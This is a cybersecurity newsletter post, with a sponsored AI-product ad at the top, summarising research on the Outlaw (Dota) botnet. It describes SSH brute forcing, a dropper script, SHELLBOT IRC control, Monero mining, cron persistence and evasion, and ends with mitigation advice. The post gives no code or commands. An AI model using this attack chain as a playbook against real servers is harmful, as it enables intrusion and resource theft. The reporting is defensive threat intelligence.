• Cyber Syrup
  • Posts
  • Outlaw Botnet: Targets Weak SSH Servers for Cryptocurrency Mining

Outlaw Botnet: Targets Weak SSH Servers for Cryptocurrency Mining

Cybersecurity researchers have released new findings on Outlaw, also known as Dota, a self-propagating botnet that targets Linux systems with exposed SSH servers

April 03, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

You’ve heard the hype. It’s time for results.

After two years of siloed experiments, proofs of concept that fail to scale, and disappointing ROI, most enterprises are stuck. AI isn't transforming their organizations — it’s adding complexity, friction, and frustration.

But Writer customers are seeing positive impact across their companies. Our end-to-end approach is delivering adoption and ROI at scale. Now, we’re applying that same platform and technology to build agentic AI that actually works for every enterprise.

This isn’t just another hype train that overpromises and underdelivers.
It’s the AI you’ve been waiting for — and it’s going to change the way enterprises operate. Be among the first to see end-to-end agentic AI in action. Join us for a live product release on April 10 at 2pm ET (11am PT).

Can't make it live? No worries — register anyway and we'll send you the recording!

Outlaw Botnet: Targets Weak SSH Servers for Cryptocurrency Mining

Cybersecurity researchers have released new findings on Outlaw, also known as Dota, a self-propagating botnet that targets Linux systems with exposed SSH servers. Outlaw leverages brute-force attacks, cryptocurrency mining, and worm-like propagation, allowing it to persist and scale its reach across compromised environments.

The research, published by Elastic Security Labs, offers a deeper look into the botnet’s tactics, techniques, and procedures (TTPs), painting a picture of a long-running and evolving threat in the cryptojacking ecosystem.

Who Is Behind Outlaw?

Outlaw is not only the name of the malware but also the threat actor group responsible for its development and deployment. Believed to be of Romanian origin, Outlaw has been active since at least 2018 and is part of a broader ecosystem of cybercriminals focused on cryptocurrency mining through illicit access.

Other major groups in this space include:

  • 8220 Gang

  • Keksec (aka Kek Security)

  • Kinsing

  • TeamTNT

These groups have repeatedly demonstrated the monetary incentives and low entry barriers associated with cryptojacking operations, particularly in Linux-based environments.

Infection Chain: How Outlaw Works

The Outlaw botnet targets poorly secured SSH servers, focusing on those with weak or default credentials. Once access is gained, the attackers add their SSH public key to the authorized_keys file, ensuring persistent, passwordless access even if credentials are rotated.

Multi-Stage Infection Flow

  1. Initial Access via SSH Brute Force

    • Exploits weak SSH credentials to gain unauthorized access

  2. Deployment of Dropper Script

    • A shell script called tddwrt7s.sh is downloaded and executed

    • This script retrieves and unpacks an archive file (dota3.tar.gz)

  3. Installation and Cleanup

    • The malware launches the cryptocurrency miner

    • Simultaneously, it removes traces of previous infections and eliminates other active miners, including its own outdated versions

Worm-Like Propagation and Brute Forcing

A standout feature of the malware is its self-propagation mechanism, driven by an initial access module known as BLITZ. This component:

  • Scans the internet for systems running SSH services

  • Connects to a C2 (Command and Control) server over SSH

  • Fetches a list of new targets to perpetuate the infection cycle

This botnet-style approach enables the malware to scale rapidly, particularly in environments with many vulnerable servers.

Exploiting Known Vulnerabilities and Telnet

Beyond brute-forcing SSH, Outlaw also targets older Linux and Unix-based systems vulnerable to:

  • CVE-2016-8655

  • CVE-2016-5195 (Dirty COW)

The malware may also use Telnet brute-forcing to expand its reach further, especially in embedded systems or IoT environments.

Command and Control with SHELLBOT

Upon establishing access, Outlaw deploys a component called SHELLBOT—a tool that connects to a C2 server via IRC (Internet Relay Chat). SHELLBOT enables a wide range of malicious activities, including:

  • Execution of arbitrary shell commands

  • Downloading and running additional payloads

  • Launching DDoS (Distributed Denial-of-Service) attacks

  • Credential theft

  • Data exfiltration

IRC remains a popular choice among threat actors for its simplicity and low visibility, especially in Linux systems.

Mining Operations and Persistence

The malware is optimized for cryptocurrency mining, specifically targeting systems for XMRig-based Monero mining.

Mining Optimization Techniques:

  • CPU Detection: Determines system capabilities for optimal mining performance

  • Hugepages Activation: Enables hugepages across all CPU cores to boost memory access efficiency

  • Persistence via Cron: Uses cron jobs to relaunch malware at reboot or predefined intervals

  • Custom Communication Binary: A tool named kswap01 maintains communication with the threat actor's infrastructure

Defense Evasion and Public Tools

Despite relying on what may appear to be basic attack methods, Outlaw integrates several techniques for defense evasion:

  • Modified XMRig miners to evade miner-detection signatures

  • SSH key manipulation for stealthy persistence

  • Publicly available scripts to clean logs and prevent detection

“Outlaw remains active despite using basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” said Elastic Security Labs. “It shows how even simple tools, when orchestrated correctly, can form a resilient and dangerous malware campaign.”

Recommendations for Mitigation

Organizations and administrators should take proactive steps to defend against threats like Outlaw:

  • Disable SSH access from the internet unless absolutely necessary

  • Use strong, unique SSH credentials and implement multi-factor authentication

  • Regularly rotate SSH keys and audit the authorized_keys file

  • Patch Linux systems to address known vulnerabilities like Dirty COW

  • Monitor for unusual processes, high CPU usage, and IRC traffic

Final Thoughts

The Outlaw botnet exemplifies how long-running, low-complexity threats can still pose serious risks when targeting misconfigured or unprotected systems. By combining brute-force access, mining, and self-propagation, the malware ensures that even basic security oversights can lead to persistent compromises and resource theft.

Maintaining SSH hygiene, monitoring system behavior, and staying up to date with Linux security patches are key defenses in today’s evolving threat landscape.